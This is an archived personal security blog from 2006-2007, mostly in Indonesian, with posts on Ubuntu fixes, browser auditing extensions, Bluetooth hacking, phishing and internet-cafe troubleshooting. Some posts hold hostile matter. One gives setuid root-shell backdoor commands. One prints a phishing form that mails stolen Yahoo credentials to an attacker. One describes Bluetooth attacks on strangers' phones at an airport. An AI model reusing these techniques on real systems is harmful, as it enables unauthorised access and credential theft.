Showing posts with label technique. Show all posts
Showing posts with label technique. Show all posts

Wednesday, April 18, 2007

sp00fed

0 comments
you've been officially sp00fed dude!


!please dont cry outloud, change all your credential A.S.A.P !

Monday, April 16, 2007

Ubuntu Troubleshoot

0 comments
Ive found two error on my ubuntu box (Linux tarantula 2.6.17-11-generic #2 SMP i686 GNU/Linux), the first problems is in my alsa driver, found dmesg output full of this kind of strings;
hda_codec: invalid dep_range_val 0:7fff
hda_codec: invalid dep_range_val 0:7fff
hda_codec: invalid dep_range_val 0:7fff
hda_codec: invalid dep_range_val 0:7fff

to fix it just add this strings to this file /etc/modprobe.d/sound
options snd-hda-intel probe_mask=3 position_fix=3

The second error that pop out on dmesg is my ndiswraper wont work perfectly, so i try this link http://ndiswrapper.sourceforge.net/mediawiki/index.php/Uninstall


Thursday, March 29, 2007

FireCAT

0 comments
Yesterday, i implemented FireCAT a.k.a Firefox Catalog of Auditing Toolbox at my browser (firefox 2.0 running on ubuntu), FireCAT is a Firefox Framework Map collection of the most useful security oriented extensions.

The basic idea is using "popular" web browser (in this case "firefox") and its extensions (developed by ethical hackers and coders) to perform pentests and audit assessments.

Here is an updated list of useful security auditing extensions

u can download the OPML here then import it to bookmark, or u can download it manually.





hackbar, "This toolbar will help you in testing sql injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT learn you how to hack a site. Its main purpose is to help a developer do security audits on his code." running on my browser



Advanced dork : Gives quick access to Google’s Advanced Operators directly from the context menu, helping u for doin google hacking :)





and else.. , so "No more Top 100 security tools, no more LiveCDs and no more exploitation frameworks. A security auditor without toolbox is like a cop without gun."



Wednesday, February 14, 2007

Its Should work, isnt it?

3 comments
Let see my environtment,

  

here are "old kind of backdooring script", that always work for me along time ago,

  

the idea is just copying root shell to user directory so the user coule execute "root shell" (in this case bash-root), then it should work arent it?

  



Ok, the file are "hot" and ready to execute with "root" SID

  

gyahh, WTF .. :P, then i try to copy manually from the root via "terminal window", using "su-" to subtitute as root



And then i execute that "bash-kopi" as a copy of root shell (/bin/bash)

  

Gyaaaah for 2nd time :P, Then i change to real-"konsole" by pressing CTRL+ALT+F1, n do the same things,
root@tarantula:~# cp /bin/bash /home/y3dips/bash-konsole
root@tarantula:~# chmod 4755 /home/y3dips/bash-konsole
n then,

  

Gyaaaaah for 3rd time, .... hueheuheuheuhe :p Tanya Kenapa :lol: ,-


Saturday, February 10, 2007

Usb ext using Utp cat.5

2 comments



Yeah, basBang banget yah :p, mungkin bagi temen-temen yang dah lama bermain dengan 802.11x (wireless) serta "antena kaleng" ini adalah hal yang dah Basi, yah mo gimana lagi, abis gw baru sempet sekarang buat cobainnya beneran (kebetulan ada kabel usb dan utp nganggur properti warnet "P) dan Alhamdulillah berhasil di percobaan pertama, tetapi bermasalah dengan "usb device (tanpa power terpisah)" yang memerlukan hantaran "power" yang relatif besar berbanding terbalik dengan jarak kabel.

Dah sering banget liat kang Onno nampilin gambar beginian di salah satu slidenya disetiap pertemuan, bahkan secara spesifik pernah dia ceritakan waktu gw duduk sebelahan di pesawat sehabis kita mengisi seminar di upn jogja. Well, apa mo di kata sekarang gw sempat dan bisa meluangkan waktu sehabis "mencuci" :p, .. let see what next ? "antena kaleng?, fake AP?" ugh yang jelas install driver DWL-G122 rev B1 dulu di "Arachnids" (server jangkrik) gw yang masih berOS-kan dapper drake.

Mudah mudahan masih bisa meluangkan waktu lebih banyak lagi setelah mencuci, hehehe

Wednesday, November 22, 2006

Firefox 2.0 Exposes Passwords

0 comments
Taken from slashdot.org, Posted by kdawson on Tuesday November 21, @06:25PM; "Firefox 2.0 Password Manager Bug Exposes Passwords"
zbuffered writes, "Today, Mozilla made public bug #360493, which exposes Firefox's Password Manager on many public sites. The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain. For example, username/password input tags on a Myspace user's site will be unhelpfully propagated with the visitor's Myspace.com credentials. It was first discovered in the wild by Netcraft on Oct. 27. As this proof-of-concept illustrates, because the username/password fields need not be visible on the page, your password can be stolen in an almost completely transparent fashion. Stopgap solutions include avoiding using Password Manager and the Master Password Timeout Firefox extension, which will at least cause a prompt before the fields are filled. However, in the original case detailed in the bug report, the phish mimicked the login.myspace.com site almost perfectly, causing many users to believe they needed to log in. A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability, is available from the bug's original author."

Saturday, November 04, 2006

Artikel tak lolos sensor

6 comments
Hum, hampir saja gw lupa kalo pernah buat artikel yang "belum ter-publish",dan emang artikel ini dah musnah dari hardisk, terpaksa deh gw cek-cek di archive email (sialnya email yang sering gw pakai "tempoe doeloe" yaitu y3d1ps(et)yahoo.com dah di blok oleh yahoo (baca pula 1 - 1 ( yahoo - y3dips )). Beruntung masih bisa gw temukan di email yang lain.

Artikel ini awalnya gw buat untuk issue #12 echo zine dan berjudul "Defeating portsentry" (baca juga article tuk issue 12), tetapi karena waktu rilis yang sudah mendesak (belum sempat di "koreksi"), maka artikel ini di tolak oleh anonymous, sedangkan artikel 0second to meet the Bug di rilis di issue #13, nah daripada terbuang percuma maka gw pikir ada baiknya gw rilis "single". Berikut sepenggal paragraf dari artikel tersebut :
Artikel ini dibuat dengan tujuan memberikan wawasan dan sedikit trik untuk
menghadapi "portsentry" yang sering digunakan untuk melengkapi "fitur"
sekuriti suatu mesin (PC/Server), kebetulan penulis merupakan pemakai
`program` ini pula (!portsentry) .Artikel ini juga secara tidak langsung
mengajak kita untuk tidak mengganggap bahwa "mengalahkan" adalah dengan
cara frontal/total , tetapi mengalahkan bisa berarti mengikuti desain atau
aturan ( design and rule)! dan mengambil keuntungan dari desain tersebut.

----| Background |----------------------------------------------------------

Dalam kegiatan "Footprinting" terhadap suatu mesin , maka kita mau atau tidak
mau harus melakukan "scanning" terhadap mesin, aktifitas scanning inilah
nantinya yang akan membantu kita dalam "mengorek" info lebih dalam tentang
mesin tersebut.Banyak sekali software yang bisa kita gunakan untuk lakukan
scanning disertai metode metode yang "dahsyat" dan fitur fitur yang keren.

Portsentry adalah program yang di gunakan untuk mendeteksi port scan
(scan thd port) pada interface jarigan sampai kepada mendeteksi sacan yang
dilakukan secara stealth (tanpa melakukan ping thd mesin, dll). Dan juga
Portsentry memiliki "alarm" yang dapat melakukan blocking terhadap mesin
yang melakukan scanning ke mesin kita (baik penambahan di hosts.deny, sampai
penambahan rule "REJECT" pada table routing)

baca secara lengkap di http://y3dips.echo.or.id/artikel/outside-ezine-Defeating_Portsentry.txt.. mudah mudahan bermanfaat :) ,; Sebenarnya ada beberapa artikel yang belum pernah gw publish kesiapapun dan bahkan berformat buku , just wait n see ...

Saturday, October 28, 2006

Bluetooth live-pentest [DW]

0 comments
Baru sempet bagi-bagi cerita soal mudik setelah gw balik lagi ke"markas" (secara gw baru aja nyampe tadi), mungkin kalo cerita std atau "biasa" gak perlu gw ceritain gimana suka-dukanya mudik, tapi gw sedikit mo bagi "skrinsot" sama sedikit cerita tentang live pen-test yang gw lakukan (kids, dont try this at home :p).

Sembari menunggu keberangkatan (maklum, gw di paksa dateng lebih awal 3 jam dari keberangkatan di karenakan "maskapai" membroadcast message tentang penerbangan yang di majukan (gw tau, ini taktik buat jebak yang telat kan? :P) dan padahal penerbangannya juga malah di undur waktunya baik saat gw saat pergi dan pulang (svck.. licik)), oke balik lagi ..

here we go.. di ruang tunggu gw iseng aja keluarin laptop (agak tengsin sih sebenernya, cuma cuek ah), rencananya mo internetan tapi karena pulsa gw tipis, alhasil gw iseng aja ngelakuin "bluetooth live-pentest" di bandara.. ( bagi yang belum konek bisa cek artikel gw di ezine issue 15 yang berjudul 101 bluetooth [in]security )



standar aja, gw cuma cek device pake perintah "hciconfig -a" (yang bikin gw kebingunggan adalah kenapa tiba tiba device gw berubah di saat yang berjeda sedikit sekali, yah gw cuekin aja, toh ntar juga "usb-dongle" gw tiba tiba gak kedetect .. lanjut dulu degh )



tuh kan gak kedetect tiba tiba ? (apa karena gw "pangku" laptopnya? dan emang usb slot gw agak-agak error gitchu), udah ah lanjut aja di scan... dan dapet 2 device yang nyala ...



akhirnya gw scan ulang sambil pegangin "dongle", ... gyah .. dan sampai akhirnya tinggal 1 yang kedetect ( mungkin yang satu dah berjalan menjauh, maklum dogle gw cuma efektif dibawah radius 10 meter)



selanjutnya kita perlu untuk mendapatkan info lebih banyak tentang "target" , salah satunya mengetahui service apa yang di jalankan oleh device. hum, lemayan ...



karena gw sedikit familiar dengan beberapa address dari device tertentu (informasi vendor (e.g s.e, nok*a dsb) tersimpan juga di alamat tersebut), dan seingat gw itu bukanlah tipikal milik s.e, nok*a, dan si##ens, jadi aku langsung aja melakukan "Helo Moto" attack (serangan terhadap motor**a device)... tetapi eh tetapi tiba tiba saja batere laptop habis (maklum dah tua dan dah gampang drop (apalagi jika CPU di paksa kerja rodi, misal tuk scanning dsb)),dan mungkin gw kurang beruntung atau "target" yang beruntung :P

Anyway, gw cuma mo membuktikan kalo masih banyak dari kita yang tidak "aware" dan tidak ada maksud destruktif dibaliknya ..

p.s: Advice, directions and instructions on this article are for educational purposes only, y3dips does not accept responsibility for any damage or injury caused as a result of its use ... :p; [DW] pada judul berarti "DEWASA" :P

Sunday, September 24, 2006

Squid 0ld trickyz

9 comments


have u seen that kind of error when u trying to download/upload somethin? from the error
The following error was encountered:
The request or reply is too large.

If you are making a POST or PUT request, then your request body (the thing you are trying to upload) is too large. If you are making a GET request, then the reply body (what you are trying to download) is too large. These limits have been established by the Internet Service Provider who operates this cache. Please contact them directly if you feel this is an error.

yeah, the proxy limiting your download/upload sizes. Let see the size of the file .. uhm 4 Megs



Well, thats on client side, lets check what server shown u, first u will see that TCP_DENIED action from the access.log file, it means all your request being Denied by the proxy servers.



If u still curious about how this could happens, let see the proxy configuration file at /etc/squid/squid.conf, u can set the limits about the size for downloading at request_body_max_size, i set it on my proxy servers about 2000 KB, so you cant download through my proxies more than that size :P



if u ask me about how to defeat it ? ill answer it rait now, did u see that two words with underline mark huh ;), did u get it now ..

Thursday, September 21, 2006

Bluetooth Programming

0 comments
Abis cari cari di CPAN, eh ternyata ada beberapa modules (.pm) buat bluetooth programming with perl, sehingga memudahkan kita (secara lo tau manfaat dari modules :p) dalam pemrograman lebih lanjut, sebagai contoh untuk modules bluetooth (Net::Bluetooth) maka gw cuma perlu meng-definisikannya pada skript yang di buat;
use Net::Bluetooth;

Sehingga kita bisa menggunakannya secara lengkap di skript (seperti yang telah di contohkann dalam penjelasan singkat dari modules tersebut), misal untuk menemukan device yang discoverable/visible (similar with "hcitool scan" command)



skript tersebut menggunakan fungsi get_remote_devices(); yang di jelaskan secara singkat dalam Bluetooth.pm sbb;
=item get_remote_devices()

Searches for remote Bluetooth devices. The search will
take approximately 5 - 10 seconds (This will be a configurable
value in the future.). When finished, it will return a hash
reference that contains the device address and name. The
address is the key and the name is the value. Name will be
set to "[unknown]" if the name could not be resolved. See the
NOTES section of this document for more information about this.

Hehehe, dah ada bayangan kan penggunaanya? !#@!#@$%^%&**&%% :lol:

Monday, September 18, 2006

Phishing ?

6 comments
'Phishing' is the term that's given to fraudulent emails and websites that are created by criminals in an attempt to get you to reveal personal details about yourself, usually your bank account information. It's not only banks that criminals masquerade as, either; any institutions involved with money, including shops and subscription services, can be copied, too. They mimic the legitimate websites and communiqués that an institution, such as your bank, would create, except that the data that you enter is sent to the criminal.source : http://uk.security.yahoo.com/protect-your-privacy/phishing-help.html

Sebenarnya istilah ini bukanlah istilah baru di dalam dunia keamanan komputer, dan juga bukan merupakan teknik baru, tetapi hanya merupakan salah satu penjelmaan dari teknik social engineering (teknik yang membuat kevin mitnick menuai beribu ribu kartu kredit, sampai akhirnya membawa dia ke tahanan).

Terkait dengan hal ini aku pun pernah mem-posting satu thread berjudul yet-another-yahoo-social-engineering-technique, dan juga aku pernah mendapatkan rekues via email secara khusus untuk mengembalikan "account" yahoo milik seseorang yang mengaku menjadi korban phishing;
Dear y3dips,

..truncated..

Jadi gini Oom..saya mau minta tulung...saya kena yahoo phising
geocities yang akhir2 ini lagi hangat dibicarakan...
Singkatnya saya, dikirimkan link Geocities dari seseorang yang
saya percaya (yang saya cari tahu di inet, bot nya tampaknya
menggenerate masuk ke list YM saya) kemudian mengirimkan link
geocities dengan tampilan yahoo photo (ada password dan
username) lagi. Sebelumnya saya udah sempet curiga mengenai
hal ini dari link URL nya...saat itu saya gak tau mengenai
informasi phising geocities ini...selain itu saya dikirinkan
kebetulan dari teman YM saya yang saya percaya...selain itu
pula siang itu saya lagi capek banget, banyak kerjaan jadinya
makin ceroboh...saya masukin deh password dan username yahooID
saya..dan kemudian saya langsung disconect YM, dan gak bisa
login YM. Kemudian saya juga gak bisa masuk email passwordnya
berubah tampaknya...masalahnya saya udah lupa mengenai
registrasi account email saya...waktu saya create...udah lama
banget, dan waktu itu saya isinya ngasal soalnya yahoo saat
itu masih baru, jadi takut kalo informasi saya digunakan
untuk hal-hal yang tidak benar...tapi ternyata saya jadi
ketergantungan dengan email itu dan lupa mengedit lagi account
info saya...

Semenjak kejadian itu (minggu lalu) sampe sekarng saya udah
ngobrol dan chat sama hacker2 lainnya sebagian besar mereka
gak bisa bantu saya...
Selain itu saya juga udah ngrim email ke Customer care yahoo
dan udah relpy2an bisa sampe 10an kali...tapi tetep mereka
gak bisa bantu...mereka cuma bisa bantu sampe saya bisa jawab
pertanyaan secret answer saya...who was my childhood hero...
tapi karena saya memang bener2 lupa ternyata jawaban saya salah,
jadi mereka stuck juga dengan kasus saya ini...


And my answer is :
see this posting ? http://y3d1ps.blogspot.com/2006/09/yet-another-yahoo-social-engineering.html

is it like that ?

then see a code, found aomethin like this "INPUT
TYPE="hidden" NAME="Mail_To"
VALUE="tieurshoes@gmail.com""

if us see the email then u may ask the guys with that
email to give your account back.. i believe the script
send your account to him, else nothin i can help u

salam
---
y3dips

Lagian, apapula yang menjamin bahwa "account" yang dia rekues adalah miliknya :), bisa jadi ini trik lain untuk mentake-over email orang yang dia laporkan adalah miliknya (aku pernah menggunakan teknik ini juga .. hehehe ... (pretend to be someone that need a help) :P)

yahoo seal

Sekitar seminggu yang lalu aku melihat yahoo mulai menelorkan teknik sign-in seal yang langsung aku aplikasikan ke laptop milikku, aku rasa "kepedulian" yahoo ini relatif dapat mengurangi exploitasi dari teknik pishing terhadap "account" yahoo (mudah-mudahan segera di ikuti oleh layanan-layan webmail besar lainnya), untuk detil apa itu "sign-in seal" bisa lihat di https://protect.login.yahoo.com/login/set_pref, diatas adalah gambar milikku (jadi kamu bisa membuatkan halaman fake untuk login page-ku ?, hum i should change it after this :P)

Wednesday, September 06, 2006

PDU converter

0 comments
At last, now i dont have to decode it (text to PDU) manually (phiew), Swen-Peter Ekkebus who made the 1st version on august 2002 (now ver 1.5), he wrote a javascript function to convert text type to PDU type also reverse it back. You know that, i almost confuse in coding it, in my mind(dream) i trying hard to develop such a program to convert a text to PDU format(but, theres no need to do it now :p) , cos the cellphone that i have only support PDU type for SMS format. Yes, it does give me a hard time to prove some Proof of concept in assessment (bluebug attack) a mobile phone through bluetooth services. (i believe it works, but not the audience; if they dont see with they own eyes :P)

U may see a picture



Interesting, huh. Bluebug attack-strike again:)

Tuesday, September 05, 2006

Yet another Yahoo Social engineering

0 comments
See this link http://www.geocities.com/making_you_laugh.com19/ ? see a picture for details, found something interesting? (thx to someone that paste it on my messenger this "early" morning ... ;) )



So, if u got this link what would u do ?, see the site URL "making_you_laugh---", does it make you curious?, you want to see it would you ? (i bet most of u will enter your id). Well y3dips, then what is the problems? .. here are somethin "funny" section:

  • in that time, i was already sign in at yahoo (my yahoo account); so, if this a legal yahoo stuff (see that page), then why do i need to log in again?

  • second, i know geocities.com would not allow such a server-side programming (php, asp, cgi, so how come the input got processed? , javascript?? ;i use this free yahoo hosting support for 6 years :P)

  • Interesting part was when I see the code; and i found this
    [legend]Login Form[/legend]
    [FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded"]
    [INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo"]
    [INPUT TYPE="hidden" NAME="Mail_To" VALUE="tieurshoes@gmail.com"]
    [INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id"]
    [INPUT TYPE="hidden" NAME="Next_Page" value="http://photos.yahoo.com/ph//my_photos"]
    [table id="yreglgtb" summary="form: login information"]

  • You got that friends ?, actually i made a stuff like this in early 2002 :). :lol:

    Tuesday, August 22, 2006

    Mengoperasi Tecra ..

    1 comments
    Sehabis di bongkar di Ambasador untuk mengganti engselnya 3 hari yang lalu ( lihat cerita sebelumnya; laptopku jiwaku :P --red ), ternyata Laptopku tercinta setelah beberapa waktu menyala maka akan restart sendiri, makin parah lagi restartnya terjadi sampai tidak bisa masuk ke sistem dan aku coba menganalisanya dengan beberapa tebakan
  • Baterenya habis, kebetulan emang pada saat aku nyalakan di rumah adek, itu gak pake listrik langsung yang artinya laptopku menggunakan batere, tetapi asumsi ini langsung gagal karena pada saat aku coba untuk nyalakan lagi sudah terhubung langsung ke listrik

  • virus?, untuk alasan ini aku masih kurang yakin, kecuali virus Mother Board Record yang sudah lama tidak terdengar gaungnya (karena tujuan pembuatan virus telah beralih maka virus MBR sudah tidak "nge-trend" lagi), tapi asumsi ini langsung terbantah saat aku gunakan LiveCD, dan lebih yakin lagi saat proses restart terjadi bahkan setelah tombol power kutekan

  • Kepanasan, asumsi ketiga ini membuat aku ragu juga, tapi hal ini membuat aku yakin pasti karena saat berada diruangan full AC, laptopku bertahan lama dan saat laptop kuletakkan di lantaipun dia gak restart-restart, sampai akhirnya aku coba merubah settingan di BIOS sampai "cooling method"-nya aku set maximum performance, kemudian aku nyalakan lagi dengan kondisi AC mati, nah mulai terulang deh kejadiannya. aku coba mendengarkan suara fan yang biasanya berderu kalo kepanasan tapi tidak terdengar (wew)
  • Sampai disini aku pada kesimpulan bahwa ada yang salah dengan sistem pendingin (kipas/fan) pada laptop-ku, cuma yang aku belum tahu 100% adalah "temperatur pada sistem/processor/CPU/laptop berpengaruh pada kondisi restart dari laptopku", okelah aku anggap aja seperti itu. Jadilah aku bongkar itu laptop dengan rasa was-was dan tidak yakin bisa merangkai ulang (ehehehhe), hasilnya bisa dilihat di gambar






    Setelah melakukan operasi besar-besaran terhadap laptopku, akhirnya aku mencoba menguatkan sambungan kabel power untuk fan (terpasang dengan baik sebelumnya, oleh karena itu aku menjadi ragu lagi atas asumsiku ini), dengan sedikit berkeringat maka aku coba kembali merangkainya, sebelum semuanya terpasang penuh, aku coba terlebih dahulu menyalakan laptopnya dan Yeah, masuk ke system. Setelah aku yakin "everythings ok" maka aku pasang semuanya kembali seperti sedia kala (walau sedikit bingung sewaktu ada "mur" yang berlebih, terpaksa bongkar lagi (maklum .., tukang servis dadakan :P)

    Setelah terpasang dan akan masuk ke system aku dengar deru suara kipas (hore, berhasil), tapi aku masih belum percaya maka sambil AC aku matikan laptop-pun aku nyalakan sampai subuh (kurang lebih selama 6 jam) dan dia masih menyala, Alhamdulillah laptopku dah sembuh. Gak jadi deh minjem laptop adek buat "demo"....

    Friday, August 18, 2006

    Pagi di Warnet

    0 comments
    Bangun pagi langsung dapat surat cinta dari yang jagain warnet, yang isinya:
    Untuk Om ammar,
  • PC 4 Gak masuk billing
  • PC 14 Gak masuk billing
  • PC 5 Gak bisa masuk windows
  • tertanda, --karakter-disamarkan (-red :P)--

    Langsung deh meluncur ke PC-4 di lt.1 dengan kecepatan 25km/jam (maklum turunan tangga bo` dan keadaan masih 50% tertidur, kekeke) , langsung nyalain tuh pc4 hum sepertinya gak ada masalah apa-apa koz setelah abis booting langsung masuk billing (hum, apa gw di kerjain neh, awas yah tunggu kalo jadual elo (yang jaga) piket lagi (kebetulan pagi-pagi dia dah ngabur balik) gw kebiri apain deh :P)... mission accomplished, going to next level.

    Berpindah tujuan ke PC 5, langsung tekan power n tunggu bentar eh loading windows(tm), langsung muncul gambar kapal terbang (hum) trus "idle" dan gak lanjutin booting exploer and masuk ke billing or windows (huh!), terpaksa booting in safemode (where windows(tm) feels safe :P), n sambil menunggu load driver gw terpaksa meluncur langsung ke PC 14 (maklum gw emang seneng buat ngelakuin 2 atau lebih hal secara berbarengan (multitasking lah istilah kerennya)) tapi dengan kecepatan menurun hanya 5km/jam karena gw kudu menanjak ke lt2 dan dengan level kesadaran (bangun) 73% (kenapa gw gak langsung ke lt2 tadi?, tapi malah turun langsung ke lt 1? karena gw baca surat cintanya dari atas jadi otak gw langsung ke pc 4 aja :P (ngantuk mode=On)).

    Tibalah di pc 14 yang untungnya pas di pojok kiri depan (jadi gak perlu nabrak-nabrak sekat sekat kalo tuh pc dibelakang), nyalain tuh pc n tunggu bentar, billing juga berjalan sempurna tuh (no problem) sambil gw menggerutu dalam hati (wah jadi nih mo di kebiri apain deh :P) eh ada yang aneh, billing tidak sepenuhnya menutupi layar (u know lah this kind of billing, i know how to break it but i wont tell u :P) karena ada window lain yang juga di load dan menjadi bagian dari taskbar yaitu mydocuments window, okelah gw masuk secara normal dan sampai sini gw dah tau masalahnya, somebody could close the billing before it process cos the window in taskbar make the billing doesnt cover all the screen, n thats make her/him unrecorded in server (gw pikir ini trik bagus, kayak di felem felem saat jagoan mengganjal pintu dengan sepotong kayu sehingga pintu tidak terkunci rapat, felem mekgever ya?).

    Saat itu dipikiran gw "its just another lame startup program", dan betul saja di dalam startup terdapat dua buah file ber-icon MsDos dan bertuliskan "empty (shortcut untuk membuka folder mydocuments, --standart--)" dan "windows(shortcut untuk membuka explorer)" selain offcourse "my billing" (billing has two method in putting there self to startup, n this client use the two of that, so no problem if u delete it). Enteng saja gw tekan delete saat kursor membiru di file "empty", yah gw pikir sudah selesai (cuma segini aja :P) eh enggak tiba tiba nonggol lagi (-tipikal malicious program-), terpaksa deh naikin lengan baju lagi (lepel kesadaran gw saat ini 99%, 1% persen ngantuk :p) dan gw mulai melakukan checking ke program yang running (biasa pake ctrl+alt+del) dengan harapan nemuin "daemon"-nya, "yupe" ada beberapa yang gw curigai (tingkat kebenaran 50 %, menginggat gw dah lama gak ngapalin service/daemon default windows), oke gw coba delete manual dari folder tree startup di mydocuments eh dia masih balik balik lagee. Males research (wak, tadi gw research? yupe, sebenernya gw dah tau gimana ngapusnya tapi cuma buat tambah tamabh ilmu aja) akhirnya gw reboot ke safemode dan gw delete manual deh (hahahahaha).
    Q:lah kok bisa ?
    A:bisa dunk, masa gak tau, kan lo pake windows(tm) mulu.. cari tau dengan jarimu :P apa itu safemode
    mission accomplished, going to prior level.

    Balik ke PC 5 dan gw dah bete buat oprak-oprek windows (gak tau kenapa akhir akhir ini gw cepet gerah kalo berurusan ma windows(tm) (--- keknya sih dari dulu.. kekekekke-)), gw langsung pilih option "Restore", padahal di mesin gw (laptop) gak pernah namanya Restorenya gw nyalain (rentan buat persembunyian worm, virus dsb) tapi ini cuma karena gw lupa matiin "restore"-nya dan gw males "trace" anomaly di windows ini.

    Kalo kata kang onno
    "install ulang aja, beres
    dan terkadang ini option yang gw pilih kalo dah males ngutekin winblows(bm) (apalagi soal virus) (hehehhehe)

    Bagi para Klien dibebaskan untuk berexplorasi, tapi ingat, disamping pake billing untuk mencatat waktu anda main, "tukang jaga" kami akan mencatat secara manual juga (ntah di otak, kertas, or di server) lamanya anda bermain "cos ud better not to trust a machine 100%". Adapun Jikalau anda masih bisa lolos dengan selamat (heuheue) maka kami akan ikhlaskan semuanya untuk "amal" dan semoga semua informasi, ilmu, downloadan dsb bisa memberi manfaat untuk anda. amin :)

    Sunday, August 13, 2006

    0\/\/n3D a mobile phone via bluetooth

    2 comments


    ini adalah screenshot dari halaman pertama paper yang aku presentasikan di "Cryptography and Wireless Security Seminar" kemaren di hotel millenium, kebetulan kemarin staff echo yang bisa hadir cuma aku dan the_day serta beberapa "individu" yang juga tergabung di dalam komunitas yang hal ini kita (aku dan the_day) kenali dari kaos echo yang mereka gunakan (ternyata "kaos" juga membuat kita saling mengenali :P).

    Pada seminar sehari itu aku menyampaikan beberapa teknik bluetooth hacking baik itu bluejacking, bluesnarfing, bluebugging, bluesmack, disertai sedikit "proof of concept" (u may call it a "demo") yang aku rasa cukup berhasil memberikan pandangan tentang "celah" berbahaya yang mengancam "bluetooth devices".

    Pada acara itu pula pak Budi Rahardjo menyampaikan materi tengtang kriptografi yang di beri judul "Cryptography on Spotlight" sedangkan kang Onno W. Purbo membahas detil tentang "Wireless technology" (dari setting di linux/windows, security dan perkuatan sinyal dengan kaleng :P).

    Buat panita, selamat atas semua jerih payahnya dan mudah-mudahan mendapatkan banyak pelajaran dan pengalaman ;). keep movin forward.



    Friday, August 04, 2006

    Bluediving

    0 comments


    Akhirnya kelar juga nginstall bluediving (Next Generation bluetooth security tools), tools yang di buat dengan perpaduan antara bahasa perl (sebagai interface) dan bahasa "C" ini mengimplementasikan berbagai jenis serangan terhadap bluetooth security seperti Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, sampai melakukan spoofing alamat Bluetooth dan memungkinkan dibuatnya RFCOMM socket shell.


    Sebenarnya aku gak sengaja menemukannya saat mencari-cari referensi AT command untuk berinteraksi dengan telepon via bluesnarfer. Satu yang aku suka adalah mode installasinya tidak "instant"jadi gak asal comot aja nih software trus bisa langsung di launch (jadi yang "bego" kayak aku kudu harus bolak balik baca error message dan jadi belajar :p), sepertinya ini tools yang bagus dan bisa di bikinkan add-ons karena perl yang bersifat "interface" tadi. Okelah kalo buat kita coba sama-sama ;) ( tapi sepertinya belun akan di pake tuk seminar sabtu depan, yah kita liat lagi deh nanti. --red)

    Thursday, August 03, 2006

    Seminar Of Cryptography and Wireless Security 2006

    0 comments
    "Seminar Of Cryptography and Wireless Security 2006"
    HOTEL MILLENIUM, jalan fachrudin 3 Kebon Sirih, Jakarta 10250
    Saturday, August 12th 2006
    ---------------------------
    1st session :
    "Cryptography on Spotlight"
    by : Budi Rahardjo (ITB)

    2nd Session :
    "Owned a mobile phone via bluetooth" (+Demo)
    by : echo team

    "Cryptography as a solution in information security"
    by : Mahasiswa STSN

    3rd session :
    "Wireless security models and threats"
    "wireless security solution"
    by : Onno W purbo
    ---------------------------
    College student : Rp.75.000,-
    Others : Rp.100.000,-

    included : cofee break 2X / lunch / certificate / seminar kit
    ----------------------------
    for more information please contact :

    Tony Kusuma ( 0856 910 696 22 ) cryptopath@yahoo.com
    Ayu Pustikasari ( 0817 648 016 7 ) ada_deing@yahoo.com
    Luvisa Kusuma ( 0813 216 542 14 ) luvisa05@yahoo.com
    Armand ( 0857 857 561 6 ) are_next07@yahoo.com
    ----------------------------
    for sponsorship please call :

    Rayi : (0856 133 272 8)
    Fajar: (0856 734 098 6)
    ----------------------------
    Organized by : Senat Mahasiswa Sekolah Tinggi Sandi Negara
    more info cek at http://echo.or.id/_temp/stsn/acara.html

    Sunday, July 16, 2006

    Bandwidth management ?

    2 comments
    bandwidth management configuration


    my sp33d net bandwidth management statistic with QoS bandwidth management

    Friday, July 14, 2006

    Clone ?

    2 comments
    Kalo mendengar kata kata Cloning apa yang kamu bayangkan ?,


    kalo gw, jadi terbayang waktu heboh hebohnya kasus akan kloning manusia mulai gencar dilakukan (diawali dengan suksesnya melakukan cloning pada hewan (e.g:domba) ; lihat gambar hasil cloningan diatsa -red). Banyak sekali yang kontra dan yang pro terhadap permasalahan ini, terlepas dari boleh or tidaknya maka hari ini istilah klonning telah mempermudah pekerjaan yang harus gw lakukan (kembali lagi itu terlepas dari "pro" dan "kontra"nya).

    Yupe, hari ini terpaksa harus meng-clone 9 buah hard disk dikarenakan sangat melelahkan jikalau harus menginstall satu persatu plus seluruh aplikasi game online (yang sedihnya lagi kudu di update dulu sebelum bisa dimainkan), Pertama berkenalan dengan istilah copy hardisk a.k.a Disk cloning adalah (sepertinya) diawal taun 1999 di lab komputer kampus, waktu itu pake Aplikasi bernama Ghost yang waktu itu (versi yang dipakai) kita gunakan adalah versi sebelum di beli oleh Symantec, aplikasinya pun masih "running under" MsDos dan masih terlihat "gak familiar" dimata gw kala itu ...

    Hari ini dikarenakan harus melakukan instalasi ke 9 buah hd tersebut maka gw kembali harus melakukan jurus disk cloning tersebut (hehehe), nah karena apabila inget kata kata disk cloning gw langsung inget ghost maka langsung aja gw cari ghost dengan versi terbaru, tetapi eh tetapi karena satu dan beberapa hal maka gw putuskan menggunakan 1 versi yang lebih rendah dan sedihnya lagi kloningannya tidak sempurna (driver dsbnya tidak terinstall dengan sempurna) terpaksa gw blingsetan (menginggat gw cuma familiar dengan ghost,(seyreem))

    Akhirnya eh akhirnya gw menemukan yang namanya Acronis (sebenernya dah lama dengernya dan dah pernah liat hasil kerjanya dalam membackup data, tapi gw gak tau sama sekali kalo dia bisa kloning hardisk (kupeeer)), acronis ini ternyata lebih dan lebih canggih dari ghost versi 9 itu. Sekarang gw lagi clone hardisk ke 4. Oke deh, doakan aku biar gak berurusan dengan siapapun akibat kloning ini. Hehehehhehe